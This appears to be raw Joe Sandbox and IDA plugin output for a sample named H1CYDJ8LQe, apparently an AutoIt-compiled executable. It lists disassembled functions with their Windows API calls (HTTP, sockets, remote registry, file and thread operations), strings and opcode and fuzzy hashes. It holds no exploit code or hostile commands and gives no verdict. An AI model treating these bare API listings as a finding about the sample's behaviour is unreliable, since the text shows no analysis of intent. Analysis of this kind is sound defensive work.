                                                            • Opcode Fuzzy Hash: dd945b6e1d8e8d9855cf24d2d3706bb91709aa24080d3beeb23df65cd9890c42
                                                            • Instruction Fuzzy Hash: 5B41C4322142405AF3619B6DFCC4BEBBB98FBA6324F10056FF185E55A0C3EA74C58769
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: ClearVariant
                                                            • String ID:
                                                            • API String ID: 1473721057-0
                                                            • Opcode ID: 3e0aaa4ed6ce8b6007e7bdda37da77eca1e161273c17b4dd860825949f7c6934
                                                            • Instruction ID: 82c0e5a8bed1f7f82a0371e607e4af2e63fad7cf90771a3a9635cac59f663638
                                                            • Opcode Fuzzy Hash: 3e0aaa4ed6ce8b6007e7bdda37da77eca1e161273c17b4dd860825949f7c6934
                                                            • Instruction Fuzzy Hash: C301ECB6000B486AD630E7B9DC84FD7B7ED6B85600F018E1DE69A82514DA75F188CB64
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Similarity
                                                            • API ID: _memmove$_memcmp
                                                            • String ID: '$\$h
                                                            • API String ID: 2205784470-1303700344
                                                            • Opcode ID: b142f59b2296442f2f65cbc20b4c9604eb51a9c16c8aaf0febd8f469beae5ca2
                                                            • Instruction ID: e67660c870af743a7fabfec7c4e9e8b186464fd05e4f656457aecd1ba61caca8
                                                            • Opcode Fuzzy Hash: b142f59b2296442f2f65cbc20b4c9604eb51a9c16c8aaf0febd8f469beae5ca2
                                                            • Instruction Fuzzy Hash: 5CE1C070A002498FDB18CFA9D8806BEFBF2FF89304F28816ED84697341D778A945CB54
                                                            APIs
                                                            • VariantInit.OLEAUT32(00000000), ref: 0045EA56
                                                            • VariantCopy.OLEAUT32(00000000), ref: 0045EA60
                                                            • VariantClear.OLEAUT32 ref: 0045EA6D
                                                            • VariantTimeToSystemTime.OLEAUT32 ref: 0045EC06
                                                            • __swprintf.LIBCMT ref: 0045EC33
                                                            • VariantInit.OLEAUT32(00000000), ref: 0045ECEE
                                                            Strings
                                                            • %4d%02d%02d%02d%02d%02d, xrefs: 0045EC2D
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Similarity
                                                            • API ID: Variant$InitTime$ClearCopySystem__swprintf
                                                            • String ID: %4d%02d%02d%02d%02d%02d
                                                            • API String ID: 2441338619-1568723262
                                                            • Opcode ID: c256a0e8f79103727635468c6c39d920c699b266699b53e39892a4f9942b48fe
                                                            • Instruction ID: 6ef9d3a4897ddb850998a39013325e9d2daf595bbef4806ea59c93c68b265cd6
                                                            • Opcode Fuzzy Hash: c256a0e8f79103727635468c6c39d920c699b266699b53e39892a4f9942b48fe
                                                            • Instruction Fuzzy Hash: F8A10873A0061487CB209F5AE48066AF7B0FF84721F1485AFED849B341C736AD99D7E5
                                                            APIs
                                                            • InterlockedIncrement.KERNEL32(004A7F04), ref: 0042C659
                                                            • InterlockedDecrement.KERNEL32(004A7F04), ref: 0042C677
                                                            • Sleep.KERNEL32(0000000A), ref: 0042C67F
                                                            • InterlockedIncrement.KERNEL32(004A7F04), ref: 0042C68A
                                                            • InterlockedDecrement.KERNEL32(004A7F04), ref: 0042C73C
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Similarity
                                                            • API ID: Interlocked$DecrementIncrement$Sleep
                                                            • String ID: @COM_EVENTOBJ
                                                            • API String ID: 327565842-2228938565
                                                            • Opcode ID: 8d68769e25e8d01640c36805b8621208eaf5358c57efe8be0f1ba0a08893845a
                                                            • Instruction ID: 079f2a2c733a9a3e151bbe14bd9981fb61a061d6167fc58a91b905d371dd4d86
                                                            • Opcode Fuzzy Hash: 8d68769e25e8d01640c36805b8621208eaf5358c57efe8be0f1ba0a08893845a
                                                            • Instruction Fuzzy Hash: 18D1D271A002198FDB10EF94C985BEEB7B0FF45304F60856AE5057B392D778AE46CB98
                                                            APIs
                                                            • VariantClear.OLEAUT32(?), ref: 0047031B
                                                            • VariantClear.OLEAUT32(?), ref: 0047044F
                                                            • VariantInit.OLEAUT32(?), ref: 004704A3
                                                            • DispCallFunc.OLEAUT32(?,?,?,00000015,?,?,?,?), ref: 00470504
                                                            • VariantClear.OLEAUT32(?), ref: 00470516
                                                              • Part of subcall function 00435481: VariantCopy.OLEAUT32(?,?), ref: 00435492
                                                            • VariantCopy.OLEAUT32(?,?), ref: 0047057A
                                                              • Part of subcall function 00435403: VariantClear.OLEAUT32(?), ref: 00435414
                                                            • VariantClear.OLEAUT32(00000000), ref: 0047060D
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Similarity
                                                            • API ID: Variant$Clear$Copy$CallDispFuncInit
                                                            • String ID: H
                                                            • API String ID: 3613100350-2852464175
                                                            • Opcode ID: a0993396c5b8998c97eda62eb292956ea80afa76050d6468dceab7f561fa4670
                                                            • Instruction ID: 4e55d858753f5aac0b63ea9498fb9ef25a468b81cfd7169f1740116cc4944d08
                                                            • Opcode Fuzzy Hash: a0993396c5b8998c97eda62eb292956ea80afa76050d6468dceab7f561fa4670
                                                            • Instruction Fuzzy Hash: 93B15BB5605311EFD710DF54C880A6BB3A4FF88308F049A2EFA8997351D738E951CB9A
                                                            APIs
                                                            • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00401D06
                                                            • DestroyWindow.USER32(?), ref: 00426F50
                                                            • UnregisterHotKey.USER32(?), ref: 00426F77
                                                            • FreeLibrary.KERNEL32(?), ref: 0042701F
                                                            • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00427050
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Similarity
                                                            • API ID: Free$DestroyLibrarySendStringUnregisterVirtualWindow
                                                            • String ID: close all
                                                            • API String ID: 4174999648-3243417748
                                                            • Opcode ID: 2f66c89a40f0e85c5d6dd4ec67defb2116834faec8b505cc193eeea2d12e665d
                                                            • Instruction ID: 89fc9d45334329c88beddca7a6314a06ce6e15860ee53b488cbf8147960762b2
                                                            • Opcode Fuzzy Hash: 2f66c89a40f0e85c5d6dd4ec67defb2116834faec8b505cc193eeea2d12e665d
                                                            • Instruction Fuzzy Hash: 9BA1C174710212CFC710EF15C985B5AF3A8BF48304F5045AEE909672A2CB78BD96CF99
                                                            APIs
                                                            • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 0044AAC5
                                                            • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 0044AAFA
                                                            • InternetQueryOptionW.WININET(00000000,0000001F,00000000,00001000), ref: 0044AB5E
                                                            • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 0044AB74
                                                            • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0044AB83
                                                            • HttpQueryInfoW.WININET(00000000,00000005,?,00001000,00000000), ref: 0044ABBB
                                                              • Part of subcall function 004422CB: GetLastError.KERNEL32 ref: 004422E1
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Similarity
                                                            • API ID: HttpInternet$OptionQueryRequest$ConnectErrorInfoLastOpenSend
                                                            • String ID:
                                                            • API String ID: 1291720006-3916222277
                                                            • Opcode ID: 91fdcc8e85295173cca015a6521aec32459a41892940df1d160b2f6c73229ea3
                                                            • Instruction ID: 89538bfc19842651326e528327905a39262a83d8aa3acd63c003c629d13479a9
                                                            • Opcode Fuzzy Hash: 91fdcc8e85295173cca015a6521aec32459a41892940df1d160b2f6c73229ea3
                                                            • Instruction Fuzzy Hash: FA51B1756403087BF710DF56DC86FEBB7A8FB88715F00851EFB0196281D7B8A5148BA8
                                                            APIs
                                                            • GetMenuItemInfoW.USER32(?,FFFFFFFF,00000000,00000030), ref: 0045FC48
                                                            • IsMenu.USER32(?), ref: 0045FC5F
                                                            • CreatePopupMenu.USER32 ref: 0045FC97
                                                            • GetMenuItemCount.USER32(?), ref: 0045FCFD
                                                            • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 0045FD26
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Similarity
                                                            • API ID: Menu$Item$CountCreateInfoInsertPopup
                                                            • String ID: 0$2
                                                            • API String ID: 93392585-3793063076
                                                            • Opcode ID: f01c363b391305104942df3bb39f3e86dedaf87795108832ec1df4cdc4019c53
                                                            • Instruction ID: a5f6d3c146e885c54ead74f35c39eec4acd60bc9fc93d28bc39e3d14768ea649
                                                            • Opcode Fuzzy Hash: f01c363b391305104942df3bb39f3e86dedaf87795108832ec1df4cdc4019c53
                                                            • Instruction Fuzzy Hash: B55192719002099BDB11DF69D888BAF7BB4BB44319F14853EEC15DB282D3B8984CCB66
                                                            APIs
                                                            • SafeArrayAccessData.OLEAUT32(?,?), ref: 004352E6
                                                            • VariantClear.OLEAUT32(?), ref: 00435320
                                                            • SafeArrayUnaccessData.OLEAUT32(?), ref: 00435340
                                                            • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00435373
                                                            • VariantClear.OLEAUT32(?), ref: 004353B3
                                                            • SafeArrayUnaccessData.OLEAUT32(?), ref: 004353F6
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Similarity
                                                            • API ID: ArrayDataSafeVariant$ClearUnaccess$AccessChangeType
                                                            • String ID: crts
                                                            • API String ID: 586820018-3724388283
                                                            • Opcode ID: 545d374044e3945891266c858ffc3b068b1e43ab9a1ba77500f3c10b34ab4cdf
                                                            • Instruction ID: e94501f388d0d73ced66c0aa9444ce68fa972137b9c89e1913ae9ea64c05cbbc
                                                            • Opcode Fuzzy Hash: 545d374044e3945891266c858ffc3b068b1e43ab9a1ba77500f3c10b34ab4cdf
                                                            • Instruction Fuzzy Hash: DE418BB5200208EBDB10CF1CD884A9AB7B5FF9C314F20852AEE49CB351E775E911CBA4
                                                            APIs
                                                              • Part of subcall function 00410120: GetFullPathNameW.KERNEL32(00000000,00000104,004A7F6C,0040F545,004A7F6C,004A90E8,004A7F6C,?,0040F545), ref: 0041013C
                                                            • lstrcmpiW.KERNEL32(?,?), ref: 0044BC09
                                                            • MoveFileW.KERNEL32(?,?), ref: 0044BC3F
                                                            • _wcscat.LIBCMT ref: 0044BCAF
                                                            • _wcslen.LIBCMT ref: 0044BCBB
                                                            • _wcslen.LIBCMT ref: 0044BCD1
                                                            • SHFileOperationW.SHELL32(?), ref: 0044BD17
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Similarity
                                                            • API ID: File_wcslen$FullMoveNameOperationPath_wcscatlstrcmpi
                                                            • String ID: \*.*
                                                            • API String ID: 2326526234-1173974218
                                                            • Opcode ID: dfa273c9728ae0aa44cf40aad3cddd2261aca17058b0337a789aafef13e29e40
                                                            • Instruction ID: cfb238852dc788c6f4e4306d35388aa956c556a9525b71239849112dc74cb112
                                                            • Opcode Fuzzy Hash: dfa273c9728ae0aa44cf40aad3cddd2261aca17058b0337a789aafef13e29e40
                                                            • Instruction Fuzzy Hash: 5C3184B1800219AACF14EFB1DC85ADEB3B5AF48304F5095EEE90997211EB35D748CB98
                                                            APIs
                                                              • Part of subcall function 00433244: _wcsncpy.LIBCMT ref: 0043325C
                                                            • _wcslen.LIBCMT ref: 004335F2
                                                            • GetFileAttributesW.KERNEL32(?), ref: 0043361C
                                                            • GetLastError.KERNEL32 ref: 0043362B
                                                            • CreateDirectoryW.KERNEL32(?,00000000), ref: 0043363F
                                                            • _wcsrchr.LIBCMT ref: 00433666
                                                              • Part of subcall function 004335CD: CreateDirectoryW.KERNEL32(?,00000000), ref: 004336A7
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                             • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: CreateDirectory$AttributesErrorFileLast_wcslen_wcsncpy_wcsrchr
                                                            • String ID: \
                                                            • API String ID: 321622961-2967466578
                                                            • Opcode ID: c150a4e9996d72ab87fed94048e5703dbc8ac01b5d1c28e2aacddbc68f85fc9a
                                                            • Instruction ID: 66c6ecc179b40ab72a0151a8d865592f5e80cbeaaa2383c239fb12261b929cf9
                                                            • Opcode Fuzzy Hash: c150a4e9996d72ab87fed94048e5703dbc8ac01b5d1c28e2aacddbc68f85fc9a
                                                            • Instruction Fuzzy Hash: C72129719013146ADF30AF25AC06BEB73AC9B05715F10569AFD18C2241E6799A888BE9
                                                            APIs
                                                            Strings
                                                            Similarity
                                                            • API ID: __wcsnicmp
                                                            • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                                                            • API String ID: 1038674560-2734436370
                                                            • Opcode ID: 7c13aa0513e4bb2138c96398a5a2566d58b08304d963883aeef11e8644bf4991
                                                            • Instruction ID: d05ed79ef8649e951018b8bbb1c2d61e3c33a7345c6b0b1fc41c187b8edaa79f
                                                            • Opcode Fuzzy Hash: 7c13aa0513e4bb2138c96398a5a2566d58b08304d963883aeef11e8644bf4991
                                                            • Instruction Fuzzy Hash: 1221003365151066E72176199C82FDBB3989FA5314F04442BFE049B242D26EF99A83E9
                                                            APIs
                                                            • GetModuleHandleW.KERNEL32(00000000,004A90E8,?,00000100,?,004A7F6C), ref: 00434057
                                                            • LoadStringW.USER32(00000000), ref: 00434060
                                                            • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 00434075
                                                            • LoadStringW.USER32(00000000), ref: 00434078
                                                            • _wprintf.LIBCMT ref: 004340A1
                                                            • MessageBoxW.USER32(00000000,?,?,00011010), ref: 004340B9
                                                            Strings
                                                            • %s (%d) : ==> %s: %s %s, xrefs: 0043409C
                                                            Similarity
                                                            • API ID: HandleLoadModuleString$Message_wprintf
                                                            • String ID: %s (%d) : ==> %s: %s %s
                                                            • API String ID: 3648134473-3128320259
                                                            • Opcode ID: 5806584fae846cee426602f55e287a2c1afdddb79e6f9c87a69d5249cd46d2cb
                                                            • Instruction ID: 3f99f1473d628bc1a501e0113e735bb0cc043e2cca9b2706ac47da9b95460e2a
                                                            • Opcode Fuzzy Hash: 5806584fae846cee426602f55e287a2c1afdddb79e6f9c87a69d5249cd46d2cb
                                                            • Instruction Fuzzy Hash: EB016CB26903187EE710E754DD06FFA376CEBC4B11F00459AB708A61C49AF469848BB5
                                                            APIs
                                                            • GetModuleHandleW.KERNEL32(KERNEL32.DLL,0048D148,00000008,00417A44,00000000,00000000,?,004115F6,?,00401BAC,?,?,?), ref: 0041794D
                                                            • __lock.LIBCMT ref: 00417981
                                                              • Part of subcall function 004182CB: __mtinitlocknum.LIBCMT ref: 004182E1
                                                              • Part of subcall function 004182CB: __amsg_exit.LIBCMT ref: 004182ED
                                                              • Part of subcall function 004182CB: EnterCriticalSection.KERNEL32(004115F6,004115F6,?,00417986,0000000D,?,004115F6,?,00401BAC,?,?,?), ref: 004182F5
                                                            • InterlockedIncrement.KERNEL32(FF00482A), ref: 0041798E
                                                            • __lock.LIBCMT ref: 004179A2
                                                            • ___addlocaleref.LIBCMT ref: 004179C0
                                                            Strings
                                                            Similarity
                                                            • API ID: __lock$CriticalEnterHandleIncrementInterlockedModuleSection___addlocaleref__amsg_exit__mtinitlocknum
                                                            • String ID: KERNEL32.DLL$pI
                                                            • API String ID: 637971194-197072765
                                                            • Opcode ID: de2ab6b473c2d5586c9f362b8c2f57dc22cd34abb7029a86a899895714b74b87
                                                            • Instruction ID: a50d44c6e21ae10dfe2421e8c890a682036196f235240147777d58dc068d601e
                                                            • Opcode Fuzzy Hash: de2ab6b473c2d5586c9f362b8c2f57dc22cd34abb7029a86a899895714b74b87
                                                            • Instruction Fuzzy Hash: A401A171404B00EFD720AF66C90A78DBBF0AF50324F20890FE496536A1CBB8A684CB5D
                                                            APIs
                                                            Similarity
                                                            • API ID: _memmove$_malloc
                                                            • String ID:
                                                            • API String ID: 1938898002-0
                                                            • Opcode ID: 1f9281079767c86d8b96628a3580c8a8d8da7ec8fe09033d6c47d2aab1b684b9
                                                            • Instruction ID: bb51e0d14dcfee45c4d36839732496dc4400bff611838f67d83ec86e680bb9ef
                                                            • Opcode Fuzzy Hash: 1f9281079767c86d8b96628a3580c8a8d8da7ec8fe09033d6c47d2aab1b684b9
                                                            • Instruction Fuzzy Hash: FC81CB726001195BDB00EF66DC42AFF7368EF84318F040A6FFD04A7282EE7D995587A9
                                                            APIs
                                                              • Part of subcall function 004413AA: DeleteObject.GDI32(?), ref: 0044140B
                                                            • SendMessageW.USER32(75C123D0,00001001,00000000,?), ref: 00448E16
                                                            • SendMessageW.USER32(75C123D0,00001026,00000000,?), ref: 00448E25
                                                              • Part of subcall function 00441432: CreateSolidBrush.GDI32(?), ref: 0044147E
                                                            Similarity
                                                            • API ID: MessageSend$BrushCreateDeleteObjectSolid
                                                            • String ID:
                                                            • API String ID: 3771399671-0
                                                            • Opcode ID: 66a9d50f8c9d6af755a83d84fc10a8c9f79f913464eba51571b63e3dd0d935a7
                                                            • Instruction ID: 7a731ed810a83f1ebb4df5e1cc4d29f9b75a103154dfe2ed632c3d1cef216bf4
                                                            • Opcode Fuzzy Hash: 66a9d50f8c9d6af755a83d84fc10a8c9f79f913464eba51571b63e3dd0d935a7
                                                            • Instruction Fuzzy Hash: 72513970204244AFF720DF24CC85FAE7BB9AF15314F10495EFA999B292CB79E549CB18
                                                            APIs
                                                            • InterlockedExchange.KERNEL32(?,000001F5), ref: 0044B4A7
                                                              • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                            • ReadFile.KERNEL32(?,?,0000FFFF,?,00000000), ref: 0044B4DA
                                                            • EnterCriticalSection.KERNEL32(?), ref: 0044B4F7
                                                            • _memmove.LIBCMT ref: 0044B555
                                                            • _memmove.LIBCMT ref: 0044B578
                                                            • LeaveCriticalSection.KERNEL32(?), ref: 0044B587
                                                            • ReadFile.KERNEL32(?,?,0000FFFF,00000000,00000000), ref: 0044B5A3
                                                            • InterlockedExchange.KERNEL32(?,000001F6), ref: 0044B5B8
                                                            Similarity
                                                            • API ID: CriticalExchangeFileInterlockedReadSection_memmove$EnterLeave_malloc
                                                            • String ID:
                                                            • API String ID: 2737351978-0
                                                            • Opcode ID: 7e8c1d8edbf82e8c7821aeb5991414bf18d3cd2399c52039398c0efb06360fcc
                                                            • Instruction ID: 70cbfa243a2dcbaabd352bc30cb9c3ad46017a318630e818b765f133545e4983
                                                            • Opcode Fuzzy Hash: 7e8c1d8edbf82e8c7821aeb5991414bf18d3cd2399c52039398c0efb06360fcc
                                                            • Instruction Fuzzy Hash: 4F41BC71900308EFDB20DF55D984EAFB7B8EF48704F10896EF54696650D7B4EA80CB58
                                                            APIs
                                                            • ___set_flsgetvalue.LIBCMT ref: 0041523A
                                                            • __calloc_crt.LIBCMT ref: 00415246
                                                            • __getptd.LIBCMT ref: 00415253
                                                            • CreateThread.KERNEL32(00000000,?,004151BB,00000000,00000004,00000000), ref: 0041527A
                                                            • ResumeThread.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 0041528A
                                                            • GetLastError.KERNEL32(?,?,?,?,?,00000000), ref: 00415295
                                                            • _free.LIBCMT ref: 0041529E
                                                            • __dosmaperr.LIBCMT ref: 004152A9
                                                              • Part of subcall function 00417F77: __getptd_noexit.LIBCMT ref: 00417F77
                                                            Similarity
                                                            • API ID: Thread$CreateErrorLastResume___set_flsgetvalue__calloc_crt__dosmaperr__getptd__getptd_noexit_free
                                                            • String ID:
                                                            • API String ID: 3638380555-0
                                                            • Opcode ID: 75aec11f1c25db1a83b42845bb08a83361ad021f560e0ff3c611ac6fdc7cb8ab
                                                            • Instruction ID: 1ae632b5747f25178f06b1f704b10109f3b838f12a9538f44878b4cc3517b2ff
                                                            • Opcode Fuzzy Hash: 75aec11f1c25db1a83b42845bb08a83361ad021f560e0ff3c611ac6fdc7cb8ab
                                                            • Instruction Fuzzy Hash: 31110A33105B00ABD2102BB69C45ADB37A4DF85734B24065FF924862D1CA7C98814AAD
                                                            APIs
                                                            • VariantInit.OLEAUT32(?), ref: 0046C96E
                                                              • Part of subcall function 00451B42: GetLastError.KERNEL32(?,?,00000000), ref: 00451BA0
                                                              • Part of subcall function 00451B42: VariantCopy.OLEAUT32(?,?), ref: 00451BF8
                                                              • Part of subcall function 00451B42: VariantCopy.OLEAUT32(?,?), ref: 00451C0E
                                                              • Part of subcall function 00451B42: VariantCopy.OLEAUT32(?,?), ref: 00451C27
                                                              • Part of subcall function 00451B42: VariantClear.OLEAUT32(?), ref: 00451CA1
                                                            Strings
                                                            Similarity
                                                            • API ID: Variant$Copy$ClearErrorInitLast
                                                            • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                                            • API String ID: 3207048006-625585964
                                                            • Opcode ID: ca4782e3f1b8c357821c68e66e95b499971d8adc7301cf0feb6afda3dd37ffd4
                                                            • Instruction ID: 684ba17e2c3ca727561f7970afa8535519679aefa5cdc663b381c32651820a10
                                                            • Opcode Fuzzy Hash: ca4782e3f1b8c357821c68e66e95b499971d8adc7301cf0feb6afda3dd37ffd4
                                                            • Instruction Fuzzy Hash: F6A19472600209ABDB10DF99DCC1EFEB3B9FB84714F10852EF604A7281E7B59D458BA5
                                                            APIs
                                                            • WSAStartup.WSOCK32(00000101,?), ref: 00465559
                                                              • Part of subcall function 0045F645: WideCharToMultiByte.KERNEL32(00000000,00000000,5004C483,D29EE858,00000000,00000000,00000000,00000000,?,?,?,00467B75,?,00473BB8,00473BB8,?), ref: 0045F661
                                                            • inet_addr.WSOCK32(?), ref: 0046559B
                                                            • gethostbyname.WSOCK32(?), ref: 004655A6
                                                            • GlobalAlloc.KERNEL32(00000040,00000040), ref: 0046561C
                                                            • _memmove.LIBCMT ref: 004656CA
                                                            • GlobalFree.KERNEL32(00000000), ref: 0046575C
                                                            • WSACleanup.WSOCK32 ref: 00465762
                                                            Similarity
                                                            • API ID: Global$AllocByteCharCleanupFreeMultiStartupWide_memmovegethostbynameinet_addr
                                                            • String ID:
                                                            • API String ID: 2945290962-0
                                                            • Opcode ID: b73dd2c417b7ad13d51beda6076b83dea337e616a356c7a57e90c36d1df505c0
                                                            • Instruction ID: 472bd1bc5547e678c188051989a3a6c7a671c7751f2ff3ad056c489052ad9926
                                                            • Opcode Fuzzy Hash: b73dd2c417b7ad13d51beda6076b83dea337e616a356c7a57e90c36d1df505c0
                                                            • Instruction Fuzzy Hash: CAA19E72604300AFD310EF65C981F5FB7E8AF88704F544A1EF64597291E778E905CB9A
                                                            APIs
                                                            • GetSystemMetrics.USER32(0000000F), ref: 00440527
                                                            • MoveWindow.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00440763
                                                            • SendMessageW.USER32(?,00000142,00000000,0000FFFF), ref: 00440782
                                                            • InvalidateRect.USER32(?,00000000,00000001), ref: 004407A5
                                                            • SendMessageW.USER32(?,00000469,?,00000000), ref: 004407DA
                                                            • ShowWindow.USER32(?,00000000,?,00000469,?,00000000), ref: 004407FD
                                                            • DefDlgProcW.USER32(?,00000005,?,?), ref: 00440817
                                                            Similarity
                                                            • API ID: MessageSendWindow$InvalidateMetricsMoveProcRectShowSystem
                                                            • String ID:
                                                            • API String ID: 1457242333-0
                                                            • Opcode ID: d4bac657e1d3c25226f3662cee365975ebc34d7204b8b764d69e27e9e2fa035e
                                                            • Instruction ID: 469fbb3f3db71b9324cb07d082b932f31bc4dcc79b85a5821822f518eef070f3
                                                            • Opcode Fuzzy Hash: d4bac657e1d3c25226f3662cee365975ebc34d7204b8b764d69e27e9e2fa035e
                                                            • Instruction Fuzzy Hash: 0BB19F71600619EFEB14CF68C984BAFBBF1FF48301F15851AEA5597280D738BA61CB54
                                                            APIs
                                                              • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                              • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                            • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046B799
                                                            Similarity
                                                            • API ID: ConnectRegistry_memmove_wcslen
                                                            • String ID:
                                                            • API String ID: 15295421-0
                                                            • Opcode ID: af9aed33993baa0a6bbf415c0be9acaad95f35a4fb003459e4997ac6d107bcf3
                                                            • Instruction ID: 8aea567fc0405534ed4901798b67d501f7e0ea7b8d3e81485b6dc33093e60a2a
                                                            • Opcode Fuzzy Hash: af9aed33993baa0a6bbf415c0be9acaad95f35a4fb003459e4997ac6d107bcf3
                                                            • Instruction Fuzzy Hash: 96A170B12043019FD710EF65CC85B1BB7E8EF85304F14892EF6859B291DB78E945CB9A
                                                            APIs
                                                              • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                                              • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                                            • _wcstok.LIBCMT ref: 004675B2
                                                              • Part of subcall function 00413EB8: __getptd.LIBCMT ref: 00413EBE
                                                            • _wcscpy.LIBCMT ref: 00467641
                                                            • GetOpenFileNameW.COMDLG32(00000058), ref: 00467774
                                                            • _wcslen.LIBCMT ref: 00467793
                                                            • _wcslen.LIBCMT ref: 004677BD
                                                              • Part of subcall function 00461465: _memmove.LIBCMT ref: 004614F8
                                                            • GetSaveFileNameW.COMDLG32(00000058), ref: 00467807
                                                            Strings
                                                            Similarity
                                                            • API ID: _wcslen$FileName_memmove$OpenSave__getptd_wcscpy_wcstok
                                                            • String ID: X
                                                            • API String ID: 780548581-3081909835
                                                            • Opcode ID: 59d8333ba564867e966a45eb1cae5b5c9aa55f5f2a82546ce07c615cef46a44c
                                                            • Instruction ID: 4d78316a312392ccd7929e5b9cc6f9f998d70627324fd0ae594e8e4bf7546d1d
                                                            • Opcode Fuzzy Hash: 59d8333ba564867e966a45eb1cae5b5c9aa55f5f2a82546ce07c615cef46a44c
                                                            • Instruction Fuzzy Hash: 1381A3315083008FD310EF65C985A5FB7E5AF84318F108A2FF599572A1EB78ED46CB9A
                                                            APIs
                                                              • Part of subcall function 0044719B: DeleteObject.GDI32(00000000), ref: 004471D8
                                                              • Part of subcall function 0044719B: ExtCreatePen.GDI32(?,?,?,00000000,00000000), ref: 00447218
                                                              • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447228
                                                              • Part of subcall function 0044719B: BeginPath.GDI32(?), ref: 0044723D
                                                              • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447266
                                                            • Ellipse.GDI32(?,?,FFFFFFFE,00000000,00000000), ref: 004474C4
                                                            • MoveToEx.GDI32(?,?,FFFFFFFE,00000000), ref: 004474D4
                                                            • AngleArc.GDI32(?,?,FFFFFFFE,00000000), ref: 0044750F
                                                            • LineTo.GDI32(?,?,FFFFFFFE), ref: 00447518
                                                            • CloseFigure.GDI32(?), ref: 0044751F
                                                            • SetPixel.GDI32(?,?,FFFFFFFE,00000000), ref: 0044752E
                                                            • Rectangle.GDI32(?,?,FFFFFFFE,00000000), ref: 0044754A
                                                            Similarity
                                                            • API ID: Object$Select$AngleBeginCloseCreateDeleteEllipseFigureLineMovePathPixelRectangle
                                                            • String ID:
                                                            • API String ID: 4082120231-0
